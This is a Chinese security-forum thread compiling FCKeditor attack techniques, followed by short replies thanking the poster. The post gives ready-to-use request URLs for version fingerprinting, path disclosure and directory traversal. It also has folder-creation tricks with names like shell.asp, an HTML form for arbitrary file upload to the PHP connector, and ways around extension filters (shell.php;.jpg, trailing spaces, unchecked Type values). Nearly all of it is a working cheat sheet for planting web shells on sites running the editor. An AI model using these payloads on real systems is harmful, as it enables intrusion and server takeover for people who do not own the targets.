请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 3185|回复: 40

Fckeditor漏洞整理集合

[复制链接]
  • TA的每日心情
    奋斗
    前天 08:46
  • 签到天数: 298 天

    [LV.8]以坛为家I

    发表于 2015-11-5 11:46:03 | 显示全部楼层 |阅读模式
    1、查看编辑器版本


    /fckeditor/editor/dialog/fck_about.html


    2、爆绝对路径


    FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)


    /FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx 2.5可突破


    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp


    3、遍历目录


    /FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../


    Version 2.4.1 测试通过


    修改CurrentFolder 参数使用 ../../来进入不同的目录:


    /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp


    根据返回的XML 信息可以查看网站所有的目录。


    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F


    也可以直接浏览盘符:


    JSP 版本:


    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F


    4、jsp上传
    /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector


    /FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

    5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
    [PHP] 纯文本查看 复制代码
    <form id="frmUpload" enctype="multipart/form-data"action="http://www.sssie.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>





    6、 FCKeditor 文件上传“.”变“_”下划线的绕过方法
    很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。试试上传1.asp;jpg
    6.1:提交shell.php+空格绕过
    不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
    6.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

    7、 突破建立文件夹
    editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

    8、 FCKeditor 中test 文件的上传地址
    FCKeditor/editor/filemanager/browser/default/connectors/test.html
    FCKeditor/editor/filemanager/upload/test.html
    FCKeditor/editor/filemanager/connectors/test.html
    FCKeditor/editor/filemanager/connectors/uploadtest.html

    9、最古老的漏洞,Type文件没有限制!

    我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!

    10、browser

    FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp

    FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

    11、本地构造test文件
    游客,如果您要查看本帖隐藏内容请回复



    回复

    使用道具 举报

  • TA的每日心情
    开心
    2016-11-17 19:54
  • 签到天数: 75 天

    [LV.6]常住居民II

    发表于 2015-11-5 13:37:46 | 显示全部楼层
    楼主威武顶起~~~
  • TA的每日心情
    奋斗
    2016-11-9 17:11
  • 签到天数: 27 天

    [LV.4]偶尔看看III

    发表于 2015-11-5 14:23:25 | 显示全部楼层
    感谢楼主分享
  • TA的每日心情
    奋斗
    2017-1-8 22:07
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2015-11-5 14:55:15 | 显示全部楼层
    继续继续学习
  • TA的每日心情
    开心
    2016-3-7 12:33
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2015-11-5 19:47:22 | 显示全部楼层
    是时候刷一波6666了
  • TA的每日心情
    开心
    2017-3-13 14:11
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2015-11-5 19:56:30 | 显示全部楼层
    跪谢楼主 楼主太强了
  • TA的每日心情
    无聊
    5 天前
  • 签到天数: 183 天

    [LV.7]常住居民III

    发表于 2015-11-5 22:42:22 来自手机 | 显示全部楼层
    楼主威武。。
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2015-11-20 09:30
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    发表于 2015-11-6 08:17:38 | 显示全部楼层
    叼炸天啊叼炸天啊
  • TA的每日心情
    擦汗
    2016-12-11 15:39
  • 签到天数: 79 天

    [LV.6]常住居民II

    发表于 2015-11-6 11:50:39 | 显示全部楼层
    楼主整理辛苦啦,
  • TA的每日心情
    擦汗
    昨天 10:51
  • 签到天数: 52 天

    [LV.5]常住居民I

    发表于 2015-11-6 15:11:54 | 显示全部楼层
    感觉好像是摘抄的
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-23 18:27 , Processed in 0.229730 second(s), 34 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表